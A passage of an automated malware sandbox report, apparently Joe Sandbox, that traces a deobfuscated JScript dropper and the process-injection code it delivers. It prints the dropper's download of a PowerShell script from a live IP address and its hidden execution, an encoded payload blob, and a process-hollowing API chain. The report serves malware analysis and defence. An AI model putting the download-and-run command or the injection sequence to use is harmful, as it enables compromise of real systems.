YSm2KvPQa8CcaKUaXKsR5DUTnVzkX3hWBao5dzhVkz1C2qtw7zMZeL+7lPdkn9qeM4/LM4gMrtC6SxQFyjzASGK8MfkHMud0P1HA6YydnZhGlPnA5dkmaec8ovl56B6hNFr1hMDF5Q32nFCrRmJ3NceCRvcrOMqmGS2fufvvfC60Tr3smhWDCXc2zJ1eYDg7+ld1dIXHgj9Lzy6tK1vdh5XtcXiF6gCx2GY6x8WE8um4dOUZbMtGGJqXqR3dcb8EB1I5oHsKrJ1prprxP/LxQbvOQ5hnWkxAXdGLBt5eWTs139qe53yMJFlb9ouHMMwtigchWNmPccx8aIThmLaKt+ilcMOOLShBCZR2lTY3PPWNERwseRxlRC6z1Aq/4JZad0Jx4HkPB5npnjPP2nNWNrkprQzptF2gakmwlXoI1RuLx07Hfk80Jlsm8gu1aZ8b3qOXkYVOsl3gZyhsQXMiTnpXHZRKMYNd6aNvg6xl00U6vA+Ey0bZ85kcPEkLuiJLfVnK21/zveocuX+zpuwayIQWI0XEVQ4RsVmkMipFH/1pWZvIC8QNt0916zct+vzZLs07OKx5VwUajDRM7UwN/0xOZo8Zghmd/glZR6r7BnxlCKxc8tC5xZKOqkX71zzgiuwXU+k2iWtjqHbrDr54rQY/xuyOK9K57DntEL7emQNPAgMNG3S1Qd/85UuMjSURhpsooHQCQ4ikESapv+hIlGzYYufKyacQBSrynGJBBGBFQFKgbxyOHz/saMQyoUWFoTSesE1hwsWxj9IvD10hZWgtBlrVpM8+96OiXTPH9EhPWe77lJwiw+aNfkEj9LJUJtJ+8wHfGcNxz0yqZDPBKUOnyNTOZC75EqLIdCK/vRmcP1KfBBmqkl/H/gEFOx8uoAzqz/a/DuIu7an1BSK+12nH1EEBAZWH8YFI7yRkzq0VOuQJzXQqrPSUdGkUCuqtfcHMA6KetkYx+7nkgD860oE+0NZJ5y83MBBF2fbkKupbHPkFEpQRWXIgxPMDp1pQ9o1vvI2EFlDWhHLc9Z3AoM9URxQQQSIKE6w04UZF8zRsWRTBDWiq6zBTJ814VKlhw1yBSXIHnQ0iIHWxBSnWBJg2/IB/FpJEmWN3kSEGS4SA5tKH0FYkrBQ4lpLHyH7ofcoF/f8KoLkRJyGhWeeC9bTvDL1iP5g38VLxZEQ+obh5YygkUKidS+f180UC+bQKEwGOK6HpEIgV2xJG6Xpr876ckaHRL79s4rkNxEFKHqmHwTv7E8IT+7NhdHgVwSqcWvWjmBss+O/JiD7ZoQUuW8KT6c+De9waYuSMC70q4EeALy0VgyeyMTXNr3kSm3pNaVP3j1DdiE+U8/Br1uYvUdquKKv8v3TTit8znHORjAhENmVzJS+CR1WGgZmfjTb7QbGpa+XaPeWhozs89Izlo8nGczOTUGPjZoZ8X4mdKhXdUbQue9Nzl2xhHkAvdBe8JHhTl4eSEep3CQ1M0W1jj1yldQ/HbQiJ8ZW24NcsYTetCO7nZKLvliqaSANrjScJvuSZI91l/+ipk4n0ASSmvWfzeulVml5AroqI8JMOCXOOFf9MVwxxzFUJMpTZLdn8notqmwYcfKocLMP3bGorrHZRIzeu+HvcqqOMthOxBGaplfaddw1MfZHskoJ0Ugfnb6jdECie/TAHPj7OWFBVsNKfBk7nBKhN/b7/GLD8p1BXgt3ZAfPXkIw3uL4VU4AaywjjLrlf2CFyzZ02ReQjCisLeMQLkct5uMC6gliG2AS0IYXi2JcjsfZWmsySj2MlTJxIasWBs1RtynRAc28aP5q9aTKa4lOldcWR69bwiLzM2hRn7SQHDD/aIdYqGVP4tA") ➔ undefined
                                                                                                                                                                                                                          • n(278,"11*M") ➔ "Close"
                                                                                                                                                                                                                          • Close() ➔ undefined
                                                                                                                                                                                                                          • Show all Function Runs
                                                                                                                                                                                                                          111
                                                                                                                                                                                                                          }
                                                                                                                                                                                                                            112
                                                                                                                                                                                                                            else
                                                                                                                                                                                                                              113
                                                                                                                                                                                                                              return LogError ( m ( 0x110 ) + http[n ( 0x11f, 'W6pb' ) ] ), ! [];
                                                                                                                                                                                                                                114
                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                  115
                                                                                                                                                                                                                                  catch ( h )
                                                                                                                                                                                                                                    116
                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                      117
                                                                                                                                                                                                                                      return LogError ( n ( 0x136, 'X@6Y' ) + h[m ( 0x130 ) ] ), ! [];
                                                                                                                                                                                                                                        118
                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                          119
                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                            120
                                                                                                                                                                                                                                            function LogError(d) {
                                                                                                                                                                                                                                              121
                                                                                                                                                                                                                                              var o = l;
                                                                                                                                                                                                                                                122
                                                                                                                                                                                                                                                WScript[o ( 0x11e, ']ZrO' ) ] ( d );
                                                                                                                                                                                                                                                  123
                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                    124
                                                                                                                                                                                                                                                    function RunPowerShellScript(d) {
                                                                                                                                                                                                                                                    • RunPowerShellScript("C:\Temp\WTRTRWFSHS.ps1") ➔ undefined
                                                                                                                                                                                                                                                    125
                                                                                                                                                                                                                                                    var q = l, p = k;
                                                                                                                                                                                                                                                      126
                                                                                                                                                                                                                                                      try
                                                                                                                                                                                                                                                        127
                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                          128
                                                                                                                                                                                                                                                          var f = POWERSHELL_CMD + '\x22' + d + '\x22';
                                                                                                                                                                                                                                                            129
                                                                                                                                                                                                                                                            shell[p ( 0x134 ) ] ( f, 0x0, ! ! [] );
                                                                                                                                                                                                                                                            • p(308) ➔ "Run"
                                                                                                                                                                                                                                                            • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"",0,true) ➔ 0
                                                                                                                                                                                                                                                            • Show all Function Runs
                                                                                                                                                                                                                                                            130
                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                              131
                                                                                                                                                                                                                                                              catch ( g )
                                                                                                                                                                                                                                                                132
                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                  133
                                                                                                                                                                                                                                                                  LogError ( q ( 0x113, 'AdoF' ) + g['message'] );
                                                                                                                                                                                                                                                                    134
                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                      135
                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                        136
                                                                                                                                                                                                                                                                        DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( k ( 0x111 ) ), WScript[l ( 0x12f, 'p8SP' ) ] ( ) );
                                                                                                                                                                                                                                                                        • DownloadScript("http://176.65.144.3/dev/BRAINNN.ps1","C:\Temp\WTRTRWFSHS.ps1") ➔ true
                                                                                                                                                                                                                                                                        • RunPowerShellScript("C:\Temp\WTRTRWFSHS.ps1") ➔ undefined

                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1352099589.00007FFC3CA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3CA00000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffc3ca00000_powershell.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 368c1fded33f56f87afa0c0f7f37178c4d904942844f86e38d9947a540da14d8
                                                                                                                                                                                                                                                                        • Instruction ID: 39c32994676b7b53a7d9dcde554cbffaaad3411d25535e178ffc412c6e1f039b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 368c1fded33f56f87afa0c0f7f37178c4d904942844f86e38d9947a540da14d8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46E15921A0CBAD4FEB5AD72C68655B83FE1EF56290B0801FBD14DC71A3DD189C06D362
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1352099589.00007FFC3CA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3CA00000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffc3ca00000_powershell.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 552e8ee4b390bbc86e63ca360e96a1c13202ca94aaabeed2f764ff86b375c312
                                                                                                                                                                                                                                                                        • Instruction ID: 70ad9fba0cdbf766bee5f37f7b423ff2a50af8ed58de725a8c5e182743093028
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 552e8ee4b390bbc86e63ca360e96a1c13202ca94aaabeed2f764ff86b375c312
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F11B222E1CA3E8BEBA8D20874691FD32C2FF942D0B590179D90DC3192DE096C09F2D2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1351666555.00007FFC3C930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C930000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffc3c930000_powershell.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                                                        • Instruction ID: 090b975304d3299881bce2a3d1c91bab9a0116a42f470d30bd516be354c02563
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B401847010CB0C4FD744EF0CE051AAAB7E0FB89360F10052DE58AC3665D622E882CB42

                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                        Execution Coverage

                                                                                                                                                                                                                                                                        Dynamic/Packed Code Coverage

                                                                                                                                                                                                                                                                        Signature Coverage

                                                                                                                                                                                                                                                                        Execution Coverage:21.8%
                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                        Signature Coverage:34.9%
                                                                                                                                                                                                                                                                        Total number of Nodes:83
                                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                        Show Legend
                                                                                                                                                                                                                                                                        Hide Nodes/Edges
                                                                                                                                                                                                                                                                        execution_graph 5148 1094c98 5149 1094cbc 5148->5149 5150 1094d58 5149->5150 5153 1099920 5149->5153 5181 109a2d9 5149->5181 5154 1099963 5153->5154 5163 109a28d 5154->5163 5209 10994a0 5154->5209 5213 1099495 5154->5213 5155 1099b2c 5156 1099c2e 5155->5156 5179 1098ec8 Wow64SetThreadContext 5155->5179 5180 1098ed0 Wow64SetThreadContext 5155->5180 5174 1099270 ReadProcessMemory 5156->5174 5157 1099d1f 5172 1098ff8 VirtualAllocEx 5157->5172 5173 1098ffa VirtualAllocEx 5157->5173 5158 1099e41 5175 1099118 WriteProcessMemory 5158->5175 5176 109911a WriteProcessMemory 5158->5176 5159 109a0a6 5168 1099118 WriteProcessMemory 5159->5168 5169 109911a WriteProcessMemory 5159->5169 5160 1099eb0 5160->5159 5164 1099118 WriteProcessMemory 5160->5164 5165 109911a WriteProcessMemory 5160->5165 5161 109a0e4 5162 109a1c9 5161->5162 5166 1098ec8 Wow64SetThreadContext 5161->5166 5167 1098ed0 Wow64SetThreadContext 5161->5167 5177 1098a18 ResumeThread 5162->5177 5178 1098a11 ResumeThread 5162->5178 5163->5150 5164->5160 5165->5160 5166->5162 5167->5162 5168->5161 5169->5161 5172->5158 5173->5158 5174->5157 5175->5160 5176->5160 5177->5163 5178->5163 5179->5156 5180->5156 5182 1099a69 5181->5182 5191 109a28d 5182->5191 5202 10994a0 CreateProcessA 5182->5202 5203 1099495 CreateProcessA 5182->5203 5183 1099b2c 5184 1099c2e 5183->5184 5217 1098ec8 5183->5217 5221 1098ed0 5183->5221 5225 1099270 5184->5225 5186 1099e41 5237 1099118 5186->5237 5241 109911a 5186->5241 5187 109a0a6 5200 1099118 WriteProcessMemory 5187->5200 5201 109911a WriteProcessMemory 5187->5201 5188 1099eb0 5188->5187 5196 1099118 WriteProcessMemory 5188->5196 5197 109911a WriteProcessMemory 5188->5197 5189 109a0e4 5190 109a1c9 5189->5190 5198 1098ec8 Wow64SetThreadContext 5189->5198 5199 1098ed0 Wow64SetThreadContext 5189->5199 5245 1098a18 5190->5245 5249 1098a11 5190->5249 5191->5150 5196->5188 5197->5188 5198->5190 5199->5190 5200->5189 5201->5189 5202->5183 5203->5183 5210 1099527 CreateProcessA 5209->5210 5212 109977c 5210->5212 5212->5212 5214 1099527 CreateProcessA 5213->5214 5216 109977c 5214->5216 5216->5216 5218 1098f19 Wow64SetThreadContext 5217->5218 5220 1098f91 5218->5220 5220->5184 5222 1098f19 Wow64SetThreadContext 5221->5222 5224 1098f91 5222->5224 5224->5184 5226 10992bc ReadProcessMemory 5225->5226 5228 1099334 5226->5228 5229 1098ff8 5228->5229 5233 1098ffa 5228->5233 5230 109903c VirtualAllocEx 5229->5230 5232 10990b4 5230->5232 5232->5186 5234 109903c VirtualAllocEx 5233->5234 5236 10990b4 5234->5236 5236->5186 5238 1099164 WriteProcessMemory 5237->5238 5240 10991fd 5238->5240 5240->5188 5242 1099164 WriteProcessMemory 5241->5242 5244 10991fd 5242->5244 5244->5188 5246 1098a5c ResumeThread 5245->5246 5248 1098aa8 5246->5248 5248->5191 5250 1098a5c ResumeThread 5249->5250 5252 1098aa8 5250->5252 5252->5191 5253 1091bd8 5254 1091c25 VirtualProtect 5253->5254 5255 1091c91 5254->5255

                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <{]?$P$Cg
                                                                                                                                                                                                                                                                        • API String ID: 0-3805422369
                                                                                                                                                                                                                                                                        • Opcode ID: 102238a7c4582137bffd4e21dac34e90856eb53eda89d9463702c3cf8c7d314a
                                                                                                                                                                                                                                                                        • Instruction ID: a83199826644448b59515736608bfd639b775a9e0c71891c90804b48f389df16
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 102238a7c4582137bffd4e21dac34e90856eb53eda89d9463702c3cf8c7d314a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A52DE74A01259CFEB64CF68C980B9EFBB6BF48310F5581E9E448AB255C730A981CF95
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <{]?$P$Cg
                                                                                                                                                                                                                                                                        • API String ID: 0-3805422369
                                                                                                                                                                                                                                                                        • Opcode ID: 7d096638b0f2cf3f51d9b19c6daec22a268b8a2b3cc3cd99a7f9d5fd5ff14a11
                                                                                                                                                                                                                                                                        • Instruction ID: b3299e4c74432d9e34d03b2b62ca3d8dbe24e5736d02e5b5d1936a636ee04be2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d096638b0f2cf3f51d9b19c6daec22a268b8a2b3cc3cd99a7f9d5fd5ff14a11
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51B1C274E01229CFEB68CF66C850BDEBBB2BF89300F10C5EAD549A7255DB305A819F51
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: <$@
                                                                                                                                                                                                                                                                        • API String ID: 0-1426351568
                                                                                                                                                                                                                                                                        • Opcode ID: 437d9d5bc6e91b02e5b45c53f144d942ef01b82507f0f5082f9e671751c2de39
                                                                                                                                                                                                                                                                        • Instruction ID: 29c975173d56cd93269c858e2c8c61ec6c8d19028ce205df6dee56feb2ebb1df
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 437d9d5bc6e91b02e5b45c53f144d942ef01b82507f0f5082f9e671751c2de39
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6627C74E0021ACFEB64CFA9CA80A9EFBF2BF48311F5581E9D448AB251D7309981DF55

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 492 1099920-1099961 493 1099968-109a335 492->493 494 1099963 492->494 496 1099a69-1099b27 493->496 497 109a33b-109a342 493->497 494->493 604 1099b2a call 10994a0 496->604 605 1099b2a call 1099495 496->605 502 1099b2c-1099b4c 503 1099b4e-1099b69 502->503 504 1099b74-1099bde 502->504 503->504 510 1099be0 504->510 511 1099be5-1099c11 504->511 510->511 513 1099c7a-1099cb5 511->513 514 1099c13-1099c29 511->514 519 1099cdd 513->519 520 1099cb7-1099cd2 513->520 613 1099c2c call 1098ec8 514->613 614 1099c2c call 1098ed0 514->614 515 1099c2e-1099c4e 517 1099c50-1099c6b 515->517 518 1099c76-1099c78 515->518 517->518 521 1099cde-1099ce8 518->521 519->521 520->519 523 1099cea 521->523 524 1099cef-1099d3f call 1099270 521->524 523->524 529 1099d41-1099d5c 524->529 530 1099d67-1099d80 524->530 529->530 531 1099dde-1099e3c 530->531 532 1099d82-1099db6 530->532 606 1099e3f call 1098ff8 531->606 607 1099e3f call 1098ffa 531->607 532->531 536 1099db8-1099dd3 532->536 536->531 540 1099e41-1099e67 542 1099e69-1099e84 540->542 543 1099e8f-1099eab 540->543 542->543 609 1099eae call 1099118 543->609 610 1099eae call 109911a 543->610 545 1099eb0-1099ed0 546 1099ef8-1099f2d 545->546 547 1099ed2-1099eed 545->547 551 109a084-109a0a0 546->551 547->546 552 1099f32-1099fb6 551->552 553 109a0a6-109a0df 551->553 563 109a079-109a07e 552->563 564 1099fbc-109a02b 552->564 602 109a0e2 call 1099118 553->602 603 109a0e2 call 109911a 553->603 558 109a0e4-109a104 559 109a12c-109a15f 558->559 560 109a106-109a121 558->560 566 109a161-109a164 559->566 567 109a167-109a17a 559->567 560->559 563->551 598 109a02e call 1099118 564->598 599 109a02e call 109911a 564->599 566->567 569 109a17c 567->569 570 109a181-109a1ac 567->570 569->570 574 109a1ae-109a1c4 570->574 575 109a215-109a250 570->575 600 109a1c7 call 1098ec8 574->600 601 109a1c7 call 1098ed0 574->601 583 109a278 575->583 584 109a252-109a26d 575->584 576 109a030-109a050 579 109a078 576->579 580 109a052-109a06d 576->580 578 109a1c9-109a1e9 581 109a1eb-109a206 578->581 582 109a211-109a213 578->582 579->563 580->579 581->582 586 109a279-109a288 582->586 583->586 584->583 611 109a28b call 1098a18 586->611 612 109a28b call 1098a11 586->612 590 109a28d-109a2ad 592 109a2af-109a2ca 590->592 593 109a2d5-109a319 590->593 592->593 593->497 598->576 599->576 600->578 601->578 602->558 603->558 604->502 605->502 606->540 607->540 609->545 610->545 611->590 612->590 613->515 614->515
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                                                                                                                                        • Opcode ID: 21ae302e2533f816825b56b963773b80c3c1959f001f394bc70ef643c29fac3e
                                                                                                                                                                                                                                                                        • Instruction ID: 67cda2bc1dfafd998c65a971d32583194c9fc4f29693efffb91e3bc910eaddff
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21ae302e2533f816825b56b963773b80c3c1959f001f394bc70ef643c29fac3e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D852D074E002288FDB68DF69C854BEDBBB2BF89304F5081E9D449AB291DB315E85DF40
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: acbcf713fcc3ac0e415152d0695c011be1c65f11ee5d248c75b48d2d198ad830
                                                                                                                                                                                                                                                                        • Instruction ID: ee527307c8898647fdc58ca6d7658ffffbc4995beb4b5ceaf04749d5e9716822
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acbcf713fcc3ac0e415152d0695c011be1c65f11ee5d248c75b48d2d198ad830
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF427F74E01219CFDB64CFA9C994B9DBBF2BF88310F5481A9E809A7355D730AA81DF50
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: d02733364744451bb364cc789addab877b23a8b5e14815706f38a3b8aba53bcb
                                                                                                                                                                                                                                                                        • Instruction ID: 38563c7f119e7e2d7c32f58e820e148a28bb458e593583118400b540f1388a9e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d02733364744451bb364cc789addab877b23a8b5e14815706f38a3b8aba53bcb
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9861B074E01218CFEB18CFAAC994B9DBBF2BF88310F1481A9D809AB264D7359941CF50
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: cd5d55741d5748f0f86f1134c8c326a933e4a180dd31523ea233f4a776c853d7
                                                                                                                                                                                                                                                                        • Instruction ID: a6a2491870d908837d8e600f2bd351f5283d2bd8536834ff667ed2cba0ee5473
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd5d55741d5748f0f86f1134c8c326a933e4a180dd31523ea233f4a776c853d7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D311178D01218CBDB04DFAAD9586EDFBF2BF8A310F00902AE446B3294DB754942DF14

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 615 1099495-1099539 617 109953b-1099552 615->617 618 1099582-10995aa 615->618 617->618 623 1099554-1099559 617->623 621 10995ac-10995c0 618->621 622 10995f0-1099646 618->622 621->622 630 10995c2-10995c7 621->630 632 1099648-109965c 622->632 633 109968c-109977a CreateProcessA 622->633 624 109955b-1099565 623->624 625 109957c-109957f 623->625 627 1099569-1099578 624->627 628 1099567 624->628 625->618 627->627 631 109957a 627->631 628->627 634 10995c9-10995d3 630->634 635 10995ea-10995ed 630->635 631->625 632->633 641 109965e-1099663 632->641 651 109977c-1099782 633->651 652 1099783-1099848 633->652 636 10995d5 634->636 637 10995d7-10995e6 634->637 635->622 636->637 637->637 640 10995e8 637->640 640->635 642 1099665-109966f 641->642 643 1099686-1099689 641->643 645 1099671 642->645 646 1099673-1099682 642->646 643->633 645->646 646->646 647 1099684 646->647 647->643 651->652 663 1099864-1099865 652->663 664 109983f-1099848 663->664 665 1099867-1099868 663->665 664->663 666 1099878-109987c 665->666 667 109986a-109986e 665->667 669 109988c-1099890 666->669 670 109987e-1099882 666->670 667->666 668 1099870 667->668 668->666 672 10998a0-10998a4 669->672 673 1099892-1099896 669->673 670->669 671 1099884 670->671 671->669 675 10998da-10998e5 672->675 676 10998a6-10998cf 672->676 673->672 674 1099898 673->674 674->672 679 10998e6 675->679 676->675 679->679
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01099767
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1332569266.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_1090000_JXCJKXCJHKJHXCJHKXCXCJHK.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                                        • Opcode ID: afa85f316dbbf7eb0f3f6d69f25b853e742c9b40b19a0ab8edcc0c90a6c89772
                                                                                                                                                                                                                                                                        • Instruction ID: 68dfa57a8560bb8bc3e9b6c3df1e998b6ab66a2bb127a710540d934cc1f88eff
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afa85f316dbbf7eb0f3f6d69f25b853e742c9b40b19a0ab8edcc0c90a6c89772
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10C12770D002198FDF24CFA8C855BEEBBB1BF49304F0481A9E849B7250DB749A85DF95

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
